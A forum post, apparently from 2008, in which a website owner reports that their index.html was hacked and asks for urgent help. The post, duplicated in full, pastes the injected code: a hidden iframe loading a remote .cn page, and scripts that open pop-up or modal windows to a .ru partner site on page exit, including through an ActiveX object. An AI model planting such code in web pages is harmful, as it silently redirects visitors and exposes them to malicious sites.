santumondal
12-26-2008, 12:37 AM
Hi,
My site was running with HTML and has been hacked yesterday.
Hacker had written a “Code” at the “body tag” section in index.html page which have javascript extension. Also create a new “body tag” at the end of this javascript code.
**************************************************************************************************** ******************************
This code is:-
<div style="visibility:hidden"><iframe src="http://directlinkq.cn/in.cgi?27" width=100 height=80></iframe></div><!-- ad --><script language="JavaScript">
function y(){self.focus()} self.moveTo(0,0);self.resizeTo(screen.availWidth,screen.availHeight); y();
setInterval("y()",300000);
</script>
<script language="javascript"><!--
var nid=0;
var tid=431;
var mid=947;
var full=1;
var popDialogOptions = "dialogWidth:800px; dialogHeight:600px; dialogTop:0px; dialogLeft:0px; edge:Raised; center:0;help:0; resizable:1; scroll:1; status:0";
var popWindowOptions = "scrollbars=1,menubar=1,toolbar=1,location=1,person albar=1,status=1,resizable=1";
var exit = true;
var usePopDialog = true;
var isUsingSpecial = false;
function normal_exit(){
if(exit && !isUsingSpecial) {
exit = false;
window.open(popURL,"",popWindowOptions);}}
--></script>
<script>
var isXPSP2 = false;
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
//--------------------------------------------------------------------------------
function ext()
{
if(exit)
{
exit=false;
if(!isXPSP2 && !usePopDialog)
{
window.open(popURL,"",popWindowOptions);
}
else if(!isXPSP2 && usePopDialog)
{
eval("window.showModalDialog(popURL,'',popDialogOptions)");
}
else
{
iie.launchURL(popURL);
}
}
}
//--------------------------------------------------------------------------------
function brs()
{
document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>";
}
//--------------------------------------------------------------------------------
function ver()
{
isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1);
if(isXPSP2) brs();
}
//--------------------------------------------------------------------------------
usePopDialog = false;
var refurl = window.location;
var popURL = 'http://cherrytv.ru/?partner=283';
isUsingSpecial = true;
eval("window.attachEvent('onload',ver);");
eval("window.attachEvent('onunload',ext);");
//--------------------------------------------------------------------------------
</script>
<body STYLE="behavior:url(#default#clientcaps)" ID="oClientCaps" onUnload="normal_exit()"><!-- /ad -->
**************************************************************************************************** ******************************
Instead of clearing of index page, I have chosen to new upload.
But today I have disappointed, the same thing happened to my fresh HTML.
Is there anybody who can help me urgently?
thanks
My site was running with HTML and has been hacked yesterday.
Hacker had written a “Code” at the “body tag” section in index.html page which have javascript extension. Also create a new “body tag” at the end of this javascript code.
**************************************************************************************************** ******************************
This code is:-
<div style="visibility:hidden"><iframe src="http://directlinkq.cn/in.cgi?27" width=100 height=80></iframe></div><!-- ad --><script language="JavaScript">
function y(){self.focus()} self.moveTo(0,0);self.resizeTo(screen.availWidth,screen.availHeight); y();
setInterval("y()",300000);
</script>
<script language="javascript"><!--
var nid=0;
var tid=431;
var mid=947;
var full=1;
var popDialogOptions = "dialogWidth:800px; dialogHeight:600px; dialogTop:0px; dialogLeft:0px; edge:Raised; center:0;help:0; resizable:1; scroll:1; status:0";
var popWindowOptions = "scrollbars=1,menubar=1,toolbar=1,location=1,person albar=1,status=1,resizable=1";
var exit = true;
var usePopDialog = true;
var isUsingSpecial = false;
function normal_exit(){
if(exit && !isUsingSpecial) {
exit = false;
window.open(popURL,"",popWindowOptions);}}
--></script>
<script>
var isXPSP2 = false;
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
//--------------------------------------------------------------------------------
function ext()
{
if(exit)
{
exit=false;
if(!isXPSP2 && !usePopDialog)
{
window.open(popURL,"",popWindowOptions);
}
else if(!isXPSP2 && usePopDialog)
{
eval("window.showModalDialog(popURL,'',popDialogOptions)");
}
else
{
iie.launchURL(popURL);
}
}
}
//--------------------------------------------------------------------------------
function brs()
{
document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>";
}
//--------------------------------------------------------------------------------
function ver()
{
isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1);
if(isXPSP2) brs();
}
//--------------------------------------------------------------------------------
usePopDialog = false;
var refurl = window.location;
var popURL = 'http://cherrytv.ru/?partner=283';
isUsingSpecial = true;
eval("window.attachEvent('onload',ver);");
eval("window.attachEvent('onunload',ext);");
//--------------------------------------------------------------------------------
</script>
<body STYLE="behavior:url(#default#clientcaps)" ID="oClientCaps" onUnload="normal_exit()"><!-- /ad -->
**************************************************************************************************** ******************************
Instead of clearing of index page, I have chosen to new upload.
But today I have disappointed, the same thing happened to my fresh HTML.
Is there anybody who can help me urgently?
thanks